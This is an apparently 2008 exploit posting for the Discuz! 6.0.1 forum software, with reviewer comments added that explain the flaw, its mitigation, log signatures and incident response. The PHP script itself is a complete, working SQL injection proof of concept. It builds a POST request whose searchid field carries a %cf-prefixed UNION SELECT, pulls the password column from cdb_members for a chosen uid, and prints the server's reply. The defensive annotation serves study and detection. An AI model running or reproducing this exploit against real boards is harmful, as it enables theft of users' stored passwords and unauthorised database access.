
discuzi-sql.txt

Posted on 07 August 2008

<?php
// Reviewer summary (defensive reading of this listing).
//
// What it is: a command-line proof-of-concept that sends a single HTTP POST
// to <path>/index.php of a Discuz! board (6.0.1 according to its own banner)
// and prints whatever the server answers.
//
// Where the weakness sits: the `searchid` form field. The value sent is not a
// number; it carries a quote followed by a UNION SELECT that reads the
// `password` column of `cdb_members`. That this is the whole attack suggests
// the application places `searchid` into a SQL statement as text.
// NOTE(review): the %cf byte directly before the quote looks like the
// multi-byte-charset trick for defeating backslash escaping; confirm against
// the vendor advisory for this release.
//
// Mitigation on the application side: treat `searchid` as an integer (cast or
// validate before use) or bind it as a query parameter; do not depend on
// quote escaping alone. Apply the vendor's fixed release.
//
// Detection: in web-server or WAF logs, look for POSTs to index.php where
// action=search and `searchid` is not purely numeric, or where the body
// contains UNION/SELECT or the table name cdb_members. This script also sends
// the fixed headers "User-Agent: wap" and "Accept-Language: zh-cn"; they are
// useful as a signature for this exact tool but are trivially changed.
//
// Response: if matching requests were answered successfully, treat the stored
// password values of the requested uids as disclosed and force resets.
//
// String literals below are kept exactly as they appear on the page.

// Bitwise AND of E_ALL and E_NOTICE leaves only the E_NOTICE bit set.
error_reporting(E_ALL&E_NOTICE);
// Banner; names the affected release and the author's stated PHP/MySQL requirements.
print_r(" +------------------------------------------------------------------+ Exploit discuz6.0.1 Just work as php>=5 & mysql>=4.1 BY james +------------------------------------------------------------------+ ");
// Four positional arguments are required; none of them is validated before use.
if($argc>4) {
    $host=$argv[1];
    $port=$argv[2];
    $path=$argv[3];
    $uid=$argv[4];
}else{
    // Too few arguments: print the usage text and stop.
    echo "Usage: php ".$argv[0]." host port path uid ";
    echo "host: target server ";
    echo "port: the web port, usually 80 ";
    echo "path: path to discuz ";
    echo "uid : user ID you wanna get ";
    echo "Example: ";
    echo "php ".$argv[0]." localhost 80 1 ";
    exit;
}
// Form body. `searchid` is the injected field; $uid is concatenated in as given
// on the command line. The table and column names here are what a log search
// or WAF rule can key on.
$content ="action=search&searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=".$uid."/*&do=submit";
// Hand-built request text: request line, fixed headers, then the form body.
$data = "POST /".$path."/index.php"." HTTP/1.1 ";
$data .= "Accept: */* ";
$data .= "Accept-Language: zh-cn ";
$data .= "Content-Type: application/x-www-form-urlencoded ";
$data .= "User-Agent: wap ";
$data .= "Host: ".$host." ";
$data .= "Content-length: ".strlen($content)." ";
$data .= "Connection: Close ";
$data .= " ";
$data .= $content." ";
// Plain socket to host:port; no timeout argument is passed.
$ock=fsockopen($host,$port);
if (!$ock) {
    echo 'No response from '.$host;
    die;
}
fwrite($ock,$data);
// Print the server's reply unmodified, reading with fgets (length limit 1024)
// until end of stream. The script does not parse the reply itself.
while (!feof($ock)) {
    echo fgets($ock, 1024);
}
?>

 
